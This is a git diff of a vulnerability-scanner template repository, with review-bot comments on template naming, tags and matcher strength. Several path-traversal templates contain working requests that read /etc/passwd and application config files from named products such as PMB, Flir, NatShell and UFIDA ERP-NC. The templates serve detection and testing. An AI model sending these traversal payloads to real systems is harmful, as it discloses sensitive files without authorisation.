imagecms + words: + - 'content="ImageCMS"' + - type: word + name: immediacy + words: + - 'content="Immediacy .NET CMS' + - type: word + name: impresscms + words: + - 'content="ImpressCMS"' + - type: word + name: impresspages-cms + words: + 
- 'content="ImpressPages"' + - type: word + name: infopark-cms-fiona + words: + - 'content="Rails Connector for Infopark CMS Fiona' + - type: word + name: instantcms + words: + - 'content="InstantCMS"' + - type: word + name: interred + words: + - 'content="InterRed ' + - type: word + name: jadu-cms + words: + - "//www.jadu.net" + - type: word + name: jieqi-cms + words: + - 'content="jieqi.com"' + - type: word + name: justsystems-homepage-builder + words: + - 'content="JustSystems Homepage Builder' + - type: word + name: kvs-cms + words: + - 'content="Kernel Video Sharing ' + - type: word + name: komodo-cms + words: + - 'content="Komodo CMS"' + - type: word + name: kryptronic + words: + - 'content="Kryptronic Software"' + - type: word + name: labrador-cms + words: + - "by Labrador CMS" + - type: word + name: lauyan-toweb + words: + - 'content="Lauyan TOWeb ' + - type: word + name: liveedit + words: + - 'content="http://www.getLiveEdit.com"' + - type: word + name: logicommerce + words: + - 'content="LogiCommerce"' + - type: word + name: loja-integrada + words: + - 'content="Loja Integrada"' + - type: word + name: mabisy + words: + - 'content="Mabisy"' + - type: word + name: mambo + words: + - 'content="Mambo -' + - type: word + name: melody + words: + - 'content="Melody CMS"' + - type: word + name: metro-publisher + words: + - 'content="Metro Publisher ' + - type: word + name: midgard-cms + words: + - 'powered">Midgard CMS' + - type: word + name: mijnwebwinkel + words: + - 'content="Mijnwebwinkel"' + - type: word + name: mintox + words: + - "MintoxPlaceHolder" + - type: word + name: movable-type + words: + - 'content="JetBrains PhpStorm/Intercat/Movable Type' + - type: word + name: netvolution + words: + - 'content="Netvolution WCM"' + - type: word + name: nucleus + words: + - 'content="Nucleus CMS ' + - type: word + name: nukeviet + words: + - 'content="NukeViet ' + - type: word + name: one.com + words: + - 'content="One.com Web Editor"' + - type: word + name: 
opennemas + words: + - 'content="OpenNemas ' + - type: word + name: orchard + words: + - 'content="Orchard"' + - type: word + name: orthodox-web-solutions + words: + - 'content="Orthodox Web Solutions ' + - type: word + name: osclass + words: + - "oc-includes/osclass/" + - type: word + name: oxatis + words: + - 'content="Oxatis ' + - type: word + name: phpshop + words: + - 'content="PHPShop CMS ' + - type: word + name: phpvide + words: + - 'content="PHPVibe"' + - type: word + name: pagecloud + words: + - 'content="Pagecloud"' + - type: word + name: pagekit + words: + - 'content="Pagekit"' + - type: word + name: parallels-presence-builder + words: + - 'content="Parallels Presence Builder ' + - type: word + name: ritecms + words: + - 'content="RiteCMS' + - type: word + name: rcms + words: + - 'content="rCMS ' + - type: word + name: rvsitebuilder + words: + - 'content="Rvglobalsoft"' + - type: word + name: subrion-cms + words: + - 'content="Subrion CMS' + - type: word + name: rapidweaver + words: + - 'content="RapidWeaver"' + - type: word + name: sumoshop + words: + - 'content="SUMOshop"' + - type: word + name: sana-commerce + words: + - 'content="Sana Commerce"' + - type: word + name: sandvox + words: + - 'content="Sandvox ' + - type: word + name: seamless-cms + words: + - 'content="OpenCities ' + - type: word + name: serendipity + words: + - 'content="Serendipity ' + - type: word + name: shopfactory + words: + - 'content="ShopFactory ' - type: word name: clockwork words: @@ -2520,11 +2917,6 @@ requests: - "ng-controller=" condition: or part: body - - type: word - name: apache - words: - - "Apache" - part: header - type: word name: lighttpd words: @@ -2565,11 +2957,6 @@ requests: words: - "Microsoft-HTTPAPI" part: header - - type: word - name: tomcat - words: - - "Tomcat" - part: header - type: word name: darkhttpd words: 
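Review bot: Two of the added word matchers in this block look mislabelled, so a hit would be reported under the wrong technology name. `name: phpvide` is paired with the word `content="PHPVibe"`, and `name: movable-type` is paired with `content="JetBrains PhpStorm/Intercat/Movable Type`, which reads like a single site's generator string rather than a product signature. I would rename the first to `name: phpvibe` and replace the second with a generator value confirmed against a real Movable Type page. Most of the added matchers carry no explicit `part:`, unlike the header-based entries later in the file, so stating `part: body` on them would keep the list consistent.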
@@ -2697,7 +3084,7 @@ requests: - "Mida eFramework" - "Server: Mida eFramework" condition: or - part: all + part: response - type: word name: SEEEMS-CMS words: @@ -2708,7 +3095,7 @@ requests: - type: regex name: awselb regex: - - 'awselb' + - "awselb" part: header - type: word name: pfsense @@ -2722,9 +3109,21 @@ requests: name: monit part: header words: - - 'Server: monit' + - "Server: monit" - type: word name: thinkphp + part: header words: - "ThinkPHP" - part: header + - type: word + name: apollo + part: body + words: + - "initApollo)(i.ApolloTargetServer.Self)" + - type: word + name: paloalto-network + part: body + words: + - "" + - "js/pan/" + condition: and diff --git a/poc/detect/terraform-detect-10708.yaml b/poc/detect/terraform-detect-10708.yaml index 2ba8d1cd70..4a458c77e2 100644 --- a/poc/detect/terraform-detect-10708.yaml +++ b/poc/detect/terraform-detect-10708.yaml @@ -1,22 +1,26 @@ id: terraform-detect + info: name: Detect Terraform Provider author: geeknik description: Write Infrastructure as Code - https://www.terraform.io/ severity: info tags: tech,terraform + requests: - method: GET path: - "{{BaseURL}}/provider.tf" + matchers-condition: and matchers: - type: word part: body words: - - "access_key" - - "terraform" + - access_key + - terraform condition: and + - type: status status: - 200 diff --git a/poc/detect/thinkcmf-detect.yaml b/poc/detect/thinkcmf-detect.yaml index 0c0bcdca20..ee3d1f7ccf 100644 --- a/poc/detect/thinkcmf-detect.yaml +++ b/poc/detect/thinkcmf-detect.yaml @@ -1,20 +1,23 @@ -id: thinkcmf-detection +id: thinkcmf-detection-2 + info: - name: ThinkCMF Detection - author: pikpikcu + name: Detect ThinkCMF + author: pikpikcu,daffainfo severity: info - tags: thinkcmf + tags: panel,thinkcmf,login + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word + part: body words: - - "X-Powered-By: ThinkCMF" - part: header - condition: and + - '' + - type: status status: - 200 
diff --git a/poc/detect/unauthorized-puppet-node-manager-detect-10959.yaml b/poc/detect/unauthorized-puppet-node-manager-detect-10959.yaml index d229013dd5..dd6e155d1a 100644 --- a/poc/detect/unauthorized-puppet-node-manager-detect-10959.yaml +++ b/poc/detect/unauthorized-puppet-node-manager-detect-10959.yaml @@ -1,24 +1,20 @@ -id: unauthorized-puppet-node-manager - -info: - name: Pupet Node Manager - author: pussycat0x - severity: medium - metadata: - fofa-dork: 'app="puppet-Node-Manager"' - tags: node,misconfig - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'Nodes' - - - type: status - status: - - 200 +id: unauthorized-puppet-node-manager +info: + name: Pupet Node Manager + author: pussycat0x + severity: medium + metadata: + fofa-dork: 'app="puppet-Node-Manager"' + tags: node,misconfig +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - 'Nodes' + - type: status + status: + - 200 diff --git a/poc/detect/virtual-ema-detect.yaml b/poc/detect/virtual-ema-detect.yaml index c9d2574216..d2d879c70b 100644 --- a/poc/detect/virtual-ema-detect.yaml +++ b/poc/detect/virtual-ema-detect.yaml @@ -3,7 +3,7 @@ info: name: Virtual EMS Panel Detection author: iamthefrogy severity: info - tags: panel,ems + tags: panel requests: - method: GET path: diff --git a/poc/detect/vsftpd-detection.yaml b/poc/detect/vsftpd-detection.yaml index f4ecde4fab..934be20cb9 100644 --- a/poc/detect/vsftpd-detection.yaml +++ b/poc/detect/vsftpd-detection.yaml 
@@ -1,10 +1,18 @@ id: vsftpd-detection info: - name: VSFTPD v2.3.4 Backdoor Command Execution + name: VSFTPD 2.3.4 - Backdoor Command Execution author: pussycat0x severity: critical - tags: network,vsftpd,ftp - reference: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ + description: VSFTPD 2.3.4 contains a backdoor command execution vulnerability. + reference: + - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: + cwe-id: CWE-78 + remediation: This backdoor was removed on July 3rd, 2011. + tags: network,vsftpd,ftp,backdoor network: - inputs: - data: "USER anonymous\r\nPASS pussycat0x\r\n" @@ -15,3 +23,5 @@ network: - type: word words: - "vsFTPd 2.3.4" + +# Enhanced by mp on 2022/05/23 diff --git a/poc/detect/wamp-xdebug-detect.yaml b/poc/detect/wamp-xdebug-detect.yaml index a0cff18d8e..c9dc3a07bb 100644 --- a/poc/detect/wamp-xdebug-detect.yaml +++ b/poc/detect/wamp-xdebug-detect.yaml @@ -1,17 +1,14 @@ id: wamp-xdebug-detect - info: name: WAMP xdebug author: e_schultze_ severity: info - # Inspired on https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py - # Goal: detect if xdebug.remote_connect_back is enabled - + reference: https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py + tags: debug,config requests: - method: GET path: - "{{BaseURL}}/?phpinfo=-1" - matchers: - type: word words: diff --git a/poc/detect/wazuh-detect.yaml b/poc/detect/wazuh-detect.yaml index 2961a8e89c..7aa27898c8 100644 --- a/poc/detect/wazuh-detect.yaml +++ b/poc/detect/wazuh-detect.yaml @@ -1,5 +1,4 @@ id: wazuh-detect - info: name: wazuh detect author: cyllective 
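Review bot: The added `cve-id:` key has no value, so it loads as null, and the new description says the target "contains a backdoor" while the only matcher visible in the second hunk is the banner word `vsFTPd 2.3.4`. A banner match shows the advertised version, not that the backdoored build is running, yet the finding is raised at `severity: critical` with `cvss-score: 10.0`. I would drop the empty key until an identifier is confirmed and word the description after what is actually checked, e.g. `description: Banner reports vsFTPd 2.3.4, a release that was distributed with a backdoor; confirm the build before treating the host as affected.` The lines between the two hunks are not shown, so other matchers may exist there.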
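Review bot: The removed comment `# Goal: detect if xdebug.remote_connect_back is enabled` was the only statement of what wamp-xdebug-detect looks for, and the new `info` block has no `description`. I would carry it over as `description: Detects whether xdebug.remote_connect_back is enabled on an exposed phpinfo page.` so a result can be interpreted without opening the referenced script. The matcher words lie outside the hunk, so the exact string checked should be confirmed against them.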
@@ -8,12 +7,10 @@ info: tags: tech,wazuh reference: - https://github.com/wazuh/wazuh - requests: - method: GET path: - "{{BaseURL}}/app/login" - matchers: - type: word part: body diff --git a/poc/detect/weblogic-detect-11144.yaml b/poc/detect/weblogic-detect-11144.yaml index 23f46a01a8..d50d670388 100644 --- a/poc/detect/weblogic-detect-11144.yaml +++ b/poc/detect/weblogic-detect-11144.yaml @@ -1,22 +1,13 @@ id: weblogic-detect info: name: Detect Weblogic - author: pdteam + author: bing0o severity: info - tags: tech,weblogic - metadata: - shodan-query: product:"Oracle Weblogic" requests: - method: GET path: - - "{{BaseURL}}/{{randstr}}" - matchers-condition: and + - "{{BaseURL}}/console/login/LoginForm.jsp" matchers: - type: word words: - - "From RFC 2068" - - "Error 404--Not Found" - condition: and - - type: status - status: - - 404 + - "WebLogic" diff --git a/poc/detect/werkzeug-debugger-detect-11197.yaml b/poc/detect/werkzeug-debugger-detect-11197.yaml index fe448bbca2..aa90f4c1a3 100644 --- a/poc/detect/werkzeug-debugger-detect-11197.yaml +++ b/poc/detect/werkzeug-debugger-detect-11197.yaml @@ -4,19 +4,14 @@ info: name: Werkzeug debugger console author: pdteam severity: info - metadata: - max-request: 1 tags: tech,werkzeug -http: +requests: - method: GET path: - "{{BaseURL}}/console" - matchers: - type: word words: - "
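Review bot: The replacement matcher in weblogic-detect is the single generic word `WebLogic` with no status matcher, so any response to `/console/login/LoginForm.jsp` that mentions the product name (an error page, a proxy or WAF block page) is reported as a detection. The fingerprint it replaces required two strings plus a 404 status under `matchers-condition: and`. I would keep a second condition, for example a `- type: status` matcher with `status: - 200` combined by `matchers-condition: and`, and state `part: body` explicitly. The hunk also removes `tags: tech,weblogic`, which takes the template out of tag-based selection.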

Interactive Console

" part: body - -# digest: 4a0a00473045022013ddd4960a4aea793abed2a46e4120c2dd2122fd149ec908a73cee9671ad065c022100cf561fa7d30e0f52d52a4b79c30869367c884abf9b90d158eaece619373644f4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/wordpress-plugins-detect.yaml b/poc/detect/wordpress-plugins-detect.yaml index e6fcb6dba4..fb3b30feac 100644 --- a/poc/detect/wordpress-plugins-detect.yaml +++ b/poc/detect/wordpress-plugins-detect.yaml @@ -1,47 +1,29 @@ id: wordpress-plugins-detect - info: name: WordPress Plugins Detection - author: 0xcrypto, foulenzer - severity: high + author: 0xcrypto + severity: info tags: fuzz,wordpress - requests: - raw: - | - GET /wp-content/plugins/{{plugin}}/readme.txt HTTP/1.1 + GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1 Host: {{Hostname}} threads: 50 payloads: - plugin: - - contact-form-7 - - wordpress-seo - - elementor - - woocommerce - - all-in-one-wp-migration - - updraftplus - - all-in-one-seo-pack - - duplicator - - essential-addons-for-elementor-lite - - optinmonster - - w3-total-cache - - redux-framework - - ninja-forms - + pluginSlug: helpers/wordlists/wordpress-plugins.txt matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "== Description ==" - extractors: - type: regex part: body group: 1 regex: - "===\\s(.*)\\s===" # extract the plugin name - - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version \ No newline at end of file + - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version diff --git a/poc/detect/wordpress-themes-detect-11316.yaml b/poc/detect/wordpress-themes-detect-11316.yaml index 4c487c4563..cb4bd85628 100644 --- a/poc/detect/wordpress-themes-detect-11316.yaml +++ b/poc/detect/wordpress-themes-detect-11316.yaml 
@@ -1,23 +1,22 @@ id: wordpress-themes-detect info: - name: WordPress Theme Detection - author: 0xcrypto, foulenzer - severity: high - tags: fuzz,wordpress + name: Find Wordpress Themes + author: micro. + severity: info + description: It detect the wordpress themes. + metadata: + max-request: 24434 -requests: +http: - raw: - | - GET /wp-content/themes/{{theme}}/readme.txt HTTP/1.1 + GET /wp-content/themes/{{themeSlug}}/readme.txt HTTP/1.1 Host: {{Hostname}} + payloads: - theme: - - twentyfifteen - - shapely - - onepress + themeSlug: helpers/wordlists/wordpress-themes.txt - threads: 50 matchers-condition: and matchers: - type: status @@ -26,4 +25,4 @@ requests: - type: word words: - - "== Description ==" \ No newline at end of file + - "== Description ==" diff --git a/poc/detect/wp-xmlrpc-pingback-detection-11627.yaml b/poc/detect/wp-xmlrpc-pingback-detection-11627.yaml index d1f2247e27..e9faa5f0c8 100644 --- a/poc/detect/wp-xmlrpc-pingback-detection-11627.yaml +++ b/poc/detect/wp-xmlrpc-pingback-detection-11627.yaml @@ -3,10 +3,10 @@ info: name: Wordpress XMLRPC Pingback detection author: pdteam severity: info - tags: wordpress,ssrf,oast reference: - https://github.com/dorkerdevil/rpckiller - https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32 + tags: wordpress,ssrf,oast,xmlrpc requests: - raw: - | diff --git a/poc/detect/yapi-detect.yaml b/poc/detect/yapi-detect.yaml index 8cf92f5a49..3d24ff00ba 100644 --- a/poc/detect/yapi-detect.yaml +++ b/poc/detect/yapi-detect.yaml @@ -3,12 +3,13 @@ info: name: YApi Detect author: pikpikcu severity: info + metadata: + shodan-query: http.title:"YApi" tags: tech,yapi requests: - method: GET path: - - "{{BaseURL}}/" - - "{{BaseURL}}:3000" + - "{{BaseURL}}" matchers-condition: and matchers: - type: word diff --git a/poc/directory_listing/Apexis-IPCAM-directory-traversal.yaml b/poc/directory_listing/Apexis-IPCAM-directory-traversal.yaml old mode 100755 new mode 100644 
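Review bot: Dropping `tags: fuzz,wordpress` leaves wordpress-themes-detect untagged just as its payload grows from three inline themes to a wordlist that the new metadata sizes at `max-request: 24434`. Scans that include or exclude templates by tag will no longer recognise it as a high-volume fuzz template. I would keep `tags: fuzz,wordpress` in the `info` block. The new description would also read better as `description: Detects installed WordPress themes by requesting each theme's readme.txt.`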
diff --git a/poc/directory_listing/ecology-filedownload-directory-traversal-7171.yaml b/poc/directory_listing/ecology-filedownload-directory-traversal-7171.yaml index ebe0ce2d65..3ebe236378 100644 --- a/poc/directory_listing/ecology-filedownload-directory-traversal-7171.yaml +++ b/poc/directory_listing/ecology-filedownload-directory-traversal-7171.yaml @@ -3,9 +3,8 @@ info: name: Ecology Directory Traversal author: princechaddha severity: medium - metadata: - fofa-query: app="泛微-协同办公OA" tags: ecology,lfi + requests: - method: GET path: diff --git a/poc/directory_listing/ecology-springframework-directoryTraversal.yaml b/poc/directory_listing/ecology-springframework-directoryTraversal.yaml old mode 100755 new mode 100644 diff --git a/poc/directory_listing/erp-nc-directory-traversal.yaml b/poc/directory_listing/erp-nc-directory-traversal.yaml index e331d54978..c5d6ef641e 100644 --- a/poc/directory_listing/erp-nc-directory-traversal.yaml +++ b/poc/directory_listing/erp-nc-directory-traversal.yaml @@ -1,14 +1,17 @@ id: erp-nc-directory-traversal + info: name: ERP-NC directory traversal author: pikpikcu severity: high reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g tags: lfi,erp-nc + requests: - method: GET path: - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=" + matchers-condition: and matchers: - type: word @@ -18,6 +21,7 @@ requests: - "admin.jsp" part: body condition: and + - type: status status: - 200 diff --git a/poc/directory_listing/flir-path-traversal.yaml b/poc/directory_listing/flir-path-traversal.yaml index 596e30a0de..dca421c8ce 100644 --- a/poc/directory_listing/flir-path-traversal.yaml +++ b/poc/directory_listing/flir-path-traversal.yaml 
@@ -1,25 +1,20 @@ id: flir-path-traversal - info: name: Flir Path Traversal author: pikpikcu severity: high reference: https://juejin.cn/post/6961370156484263972 tags: flir,lfi - requests: - method: GET path: - "{{BaseURL}}/download.php?file=/etc/passwd" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" condition: and - - type: status status: - 200 diff --git a/poc/directory_listing/ibm-infoprint-directory-traversal-8098.yaml b/poc/directory_listing/ibm-infoprint-directory-traversal-8098.yaml index fdbcdb53af..f9fbad5322 100644 --- a/poc/directory_listing/ibm-infoprint-directory-traversal-8098.yaml +++ b/poc/directory_listing/ibm-infoprint-directory-traversal-8098.yaml @@ -1,15 +1,10 @@ id: ibm-infoprint-lfi info: - name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Local File Inclusion + name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal author: harshbothra_ severity: medium - description: IBM InfoPrint 4247-Z03 Impact Matrix Printer is subject to local file inclusion. - reference: - - https://www.exploit-db.com/exploits/47835 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + description: Directory traversal vulnerability on IBM InfoPrint 4247-Z03 Impact Matrix Printer. + reference: https://www.exploit-db.com/exploits/47835 tags: ibm,lfi,matrix,printer requests: - method: GET @@ -24,5 +19,3 @@ requests: regex: - "root:.*:0:0:" part: body - -# Enhanced by mp on 2022/07/22 diff --git a/poc/directory_listing/natshell-path-traversal.yaml b/poc/directory_listing/natshell-path-traversal.yaml index 9dd202e3ec..391bb848a2 100644 --- a/poc/directory_listing/natshell-path-traversal.yaml +++ b/poc/directory_listing/natshell-path-traversal.yaml 
@@ -1,29 +1,24 @@ id: natshell-path-traversal + info: - name: NatShell - Local File Inclusion + name: NatShell Path Traversal author: pikpikcu severity: high - description: NatShell is vulnerable to local file inclusion. - reference: - - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - metadata: - fofa-query: title="蓝海卓越计费管理系统" + reference: https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw tags: natshell,lfi + requests: - method: GET path: - "{{BaseURL}}/download.php?file=../../../../../etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - "toor:[x*]:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/07/27 diff --git a/poc/directory_listing/oa-tongda-path-traversal-9177.yaml b/poc/directory_listing/oa-tongda-path-traversal-9177.yaml index a5d4aa6dfc..56aa950f64 100644 --- a/poc/directory_listing/oa-tongda-path-traversal-9177.yaml +++ b/poc/directory_listing/oa-tongda-path-traversal-9177.yaml @@ -1,11 +1,12 @@ id: oa-tongda-path-traversal + info: name: OA TongDa Path Traversal author: pikpikcu severity: critical - reference: - - https://github.com/jas502n/OA-tongda-RCE + reference: https://github.com/jas502n/OA-tongda-RCE tags: tongda,lfi + requests: - raw: - | @@ -14,6 +15,7 @@ requests: Content-Type: application/x-www-form-urlencoded json={"url":"/general/../../mysql5/my.ini"} + matchers-condition: and matchers: - type: word diff --git a/poc/directory_listing/pmb-directory-traversal.yaml b/poc/directory_listing/pmb-directory-traversal.yaml index 8c9f04c593..8770d69cab 100644 --- a/poc/directory_listing/pmb-directory-traversal.yaml +++ b/poc/directory_listing/pmb-directory-traversal.yaml 
@@ -1,23 +1,22 @@ id: pmb-directory-traversal + info: - name: PMB 5.6 - Arbitrary File Retrieval + name: PMB 5.6 Directory Traversal + reference: https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html author: geeknik severity: medium - description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, wchi can be used for local file retrieval. - reference: - - https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html - tags: lfi + requests: - method: GET path: - "{{BaseURL}}/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik" - "{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik" - stop-at-first-match: true + matchers-condition: and matchers: - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" - type: status status: - 200 diff --git a/poc/directory_listing/tpshop-directory-traversal.yaml b/poc/directory_listing/tpshop-directory-traversal.yaml index 7f794cefeb..47af9e5038 100644 --- a/poc/directory_listing/tpshop-directory-traversal.yaml +++ b/poc/directory_listing/tpshop-directory-traversal.yaml @@ -1,27 +1,24 @@ id: tpshop-directory-traversal + info: - name: TPshop - Local File Inclusion + name: TPshop Directory Traversal author: pikpikcu - description: TPshop is vulnerable to local file inclusion. severity: high - reference: - - https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + reference: https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA tags: tpshop,lfi + requests: - method: GET path: - "{{BaseURL}}/index.php/Home/uploadify/fileList?type=.+&path=../../../" + matchers-condition: and matchers: + - type: word words: - '"state":"SUCCESS"' + - type: status status: - 200 - -# Enhanced by mp on 2022/08/04 
diff --git a/poc/directory_listing/wooyun-path-traversal.yaml b/poc/directory_listing/wooyun-path-traversal.yaml index 515f1293b5..bb0ba90489 100644 --- a/poc/directory_listing/wooyun-path-traversal.yaml +++ b/poc/directory_listing/wooyun-path-traversal.yaml @@ -1,21 +1,21 @@ id: wooyun-path-traversal - info: - name: Wooyun Path Traversal + name: Wooyun - Local File Inclusion author: pikpikcu severity: high - reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html description: | - A general document of UFIDA ERP-NC contains a vulnerability - (affecting a large number of well-known school government and enterprise cases - such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo) - tags: lfi - + Wooyun is vulnerable to local file inclusion. + reference: + - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + tags: lfi,wooyun requests: - method: GET path: - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml" - matchers-condition: and matchers: - type: status @@ -26,4 +26,6 @@ requests: - - part: body - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/07/29 diff --git a/poc/docker/docker-compose-config.yaml b/poc/docker/docker-compose-config.yaml index 7a8bba1698..a0adf33410 100644 --- a/poc/docker/docker-compose-config.yaml +++ b/poc/docker/docker-compose-config.yaml @@ -1,11 +1,9 @@ id: docker-compose-config - info: name: docker-compose.yml exposure author: meme-lord,blckraven,geeknik severity: medium tags: config,exposure,devops - requests: - method: GET redirects: true 
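Review bot: The new `name: Wooyun - Local File Inclusion` and the description `Wooyun is vulnerable to local file inclusion.` name the wrong thing. The removed description identifies the affected product as UFIDA ERP-NC, and the reference URL is a Wooyun bug report, which is where the issue was published. I would write `name: UFIDA ERP-NC - Local File Inclusion` and `description: UFIDA ERP-NC is vulnerable to local file inclusion through the NCFindWeb filename parameter.` Adding the `erp-nc` tag used by erp-nc-directory-traversal earlier in this commit would keep findings for the same product and endpoint grouped together.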
@@ -18,14 +16,12 @@ requests: - "{{BaseURL}}/docker-compose.dev.yml" - "{{BaseURL}}/docker-compose-dev.yml" - "{{BaseURL}}/docker-compose.override.yml" - stop-at-first-match: true matchers-condition: and matchers: - type: dsl dsl: - 'regex("^version: ", body) && contains(body, "services:")' - - type: status status: - 200 diff --git a/poc/docker/dockercfg-config.yaml b/poc/docker/dockercfg-config.yaml index b3b3106bb5..98e9374f57 100644 --- a/poc/docker/dockercfg-config.yaml +++ b/poc/docker/dockercfg-config.yaml @@ -1,32 +1,26 @@ id: dockercfg-config - info: name: Detect .dockercfg author: geeknik severity: high description: Docker registry authentication data tags: docker,exposure,config - requests: - method: GET path: - "{{BaseURL}}/.dockercfg" - "{{BaseURL}}/.docker/config.json" - matchers-condition: and matchers: - - type: word words: - '"email":' - '"auth":' condition: and - - type: word part: header words: - "text/plain" - - type: status status: - 200 diff --git a/poc/docker/dockerfile-hidden-disclosure.yaml b/poc/docker/dockerfile-hidden-disclosure.yaml index feb4a915f9..e62fc2fc5e 100644 --- a/poc/docker/dockerfile-hidden-disclosure.yaml +++ b/poc/docker/dockerfile-hidden-disclosure.yaml @@ -3,7 +3,8 @@ info: name: Dockerfile Hidden Disclosure author: dhiyaneshDk severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/dockerfile-hidden-disclosure.json + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/dockerfile-hidden-disclosure.json tags: exposure,config requests: - method: GET diff --git a/poc/docker/kubernetes-enterprise-manager-8528.yaml b/poc/docker/kubernetes-enterprise-manager-8528.yaml index 302d824370..76bbb6be88 100644 --- a/poc/docker/kubernetes-enterprise-manager-8528.yaml +++ b/poc/docker/kubernetes-enterprise-manager-8528.yaml 
@@ -1,21 +1,25 @@ id: kubernetes-enterprise-manager + info: name: Detect Kubernetes Enterprise Manager author: pussycat0x severity: info - metadata: - fofa-query: app="Kubernetes-Enterprise-Manager" tags: tech,kubernetes + metadata: + fofa-query: 'app="Kubernetes-Enterprise-Manager"' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - "Kubernetes Enterprise Manager" + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/docker/kubernetes-pods-8542.yaml b/poc/docker/kubernetes-pods-8542.yaml index aa6e146225..302ed569e8 100644 --- a/poc/docker/kubernetes-pods-8542.yaml +++ b/poc/docker/kubernetes-pods-8542.yaml @@ -1,36 +1,25 @@ id: kubernetes-pods-api - info: - name: Kubernetes Pods - API Discovery & Remote Code Execution + name: Kubernetes Pods API author: ilovebinbash,geeknik,0xtavian severity: critical - description: A Kubernetes Pods API was discovered. When the service port is available, unauthenticated users can execute commands inside the container. - reference: - - https://github.com/officialhocc/Kubernetes-Kubelet-RCE - - https://blog.binaryedge.io/2018/12/06/kubernetes-being-hijacked-worldwide/ + description: When the service port is available, anyone can execute commands inside the container. See https://github.com/officialhocc/Kubernetes-Kubelet-RCE for inspiration. + reference: https://blog.binaryedge.io/2018/12/06/kubernetes-being-hijacked-worldwide/ tags: k8,unauth,kubernetes,devops - metadata: - max-request: 2 - -http: +requests: - method: GET path: - '{{BaseURL}}/pods' - '{{BaseURL}}/api/v1/pods' - matchers-condition: and matchers: - type: word words: - "apiVersion" - - type: word words: - "application/json" part: header - - type: status status: - 200 - -# Enhanced by mp on 2022/05/20 diff --git a/poc/docker/kubernetes-version.yaml b/poc/docker/kubernetes-version.yaml index cd82e92ef3..60539517e2 100644 --- a/poc/docker/kubernetes-version.yaml 
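Review bot: In the kubernetes-pods-8542.yaml hunk the new `description` carries a link inline ("See https://github.com/officialhocc/Kubernetes-Kubelet-RCE for inspiration") and `reference` becomes a single scalar, while other templates in this same patch (dockerfile-hidden-disclosure.yaml, misconfigured-docker-8900.yaml) move `reference` to a list. Keeping both URLs as list items under `reference:` and leaving the description as the one-sentence impact statement would keep the metadata uniform and machine-readable. Separately, at `severity: critical` the matchers only establish that a 200 JSON response containing `apiVersion` came back; a body word specific to a pod listing would make the finding easier to trust during triage.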
